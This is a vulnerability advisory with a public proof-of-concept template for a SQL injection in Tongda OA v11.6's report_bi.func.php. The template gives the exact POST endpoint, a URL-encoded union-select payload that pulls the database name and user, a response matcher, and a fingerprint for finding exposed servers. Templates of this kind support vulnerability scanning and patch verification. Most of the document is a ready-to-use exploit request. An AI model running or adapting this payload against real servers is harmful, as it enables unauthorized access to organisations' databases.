tongda-report-bi-func-sql-inject: Tongda OA (通达OA) v11.6 report_bi.func.php SQL injection vulnerability

Date: 2025-09-01 | Affected software: Tongda OA (通达OA) | PoC: public

Vulnerability description

Tongda OA (通达OA) v11.6 has a SQL injection vulnerability in report_bi.func.php; an attacker who exploits it can read database information. Fingerprint: app="TDXK-通达OA"

PoC code [public]

id: tongda-report-bi-func-sql-inject

info:
  name: 通达OA v11.6 report_bi.func.php SQL注入漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |
    通达OA v11.6 report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息
    app="TDXK-通达OA"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20report_bi.func.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: POST
      path: /general/bi_design/appcenter/report_bi.func.php
      body: |
        _POST[dataset_id]=efgh%27-%40%60%27%60%29union+select+database%28%29%2C2%2Cuser%28%29%23%27&action=get_link_info&
    expression: response.status == 200  && response.body.bcontains(b'"col":') && response.body.bcontains(b'"td_oa"') && response.body.bcontains(b'"target":') && response.body.bcontains(b'"para":')
expression: r0()
